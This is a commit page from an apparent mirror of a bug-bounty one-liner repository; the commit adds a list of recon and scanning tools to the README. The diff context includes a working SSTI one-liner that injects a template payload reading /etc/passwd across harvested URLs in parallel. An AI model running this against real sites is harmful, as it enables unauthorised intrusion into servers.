daffainfo
/
Oneliner-Bugbounty
mirror of https://github.com/daffainfo/Oneliner-Bugbounty.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Add tools list

main
Muhammad Daffa 2022-06-19 05:48:43 +07:00
parent fa2460adec
commit 519ca6c7d6
1 changed files with 17 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

19
README.md
View File

@ -1,5 +1,20 @@
# Oneliner-Bugbounty # Oneliner-Bugbounty
A collection oneliner scripts for bug bounty A collection oneliner scripts for bug bounty
## List tools
- [Subfinder](https://github.com/projectdiscovery/subfinder)
- [Naabu](https://github.com/projectdiscovery/naabu)
- [httpx](https://github.com/projectdiscovery/httpx)
- [Nuclei](https://github.com/projectdiscovery/nuclei)
- [Waybackurls](https://github.com/tomnomnom/waybackurls)
- [DNSProbe](https://github.com/projectdiscovery/dnsprobe)
- [gf](https://github.com/tomnomnom/gf)
- [sqlmap](https://github.com/sqlmapproject/sqlmap)
- [qsreplace](https://github.com/tomnomnom/qsreplace)
- [hakrawler](https://github.com/hakluke/hakrawler)
- [Puredns](https://github.com/d3mondev/puredns)
- [GauPlus](https://github.com/bp0lr/gauplus)
- [uro](https://github.com/s0md3v/uro)
### Auto scanner ### Auto scanner
@ -34,7 +49,7 @@ subfinder -d site.com -all -silent | waybackurls | sort -u | gf redirect | qsrep
### Find SSTI at scale ### Find SSTI at scale
```bash ```bash
echo "domain" | subfinder -silent | waybackurls | gf ssti | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | parallel -j50 -q curl -g | grep "root:x" echo "domain" | subfinder -silent | waybackurls | gf ssti | qsreplace "{{''.class.mro[2].subclasses()[40]('/etc/passwd').read()}}" | parallel -j50 -q curl -g | grep "root:x"
``` ```
### Scanning top exploited vulnerabilities according to CISA ### Scanning top exploited vulnerabilities according to CISA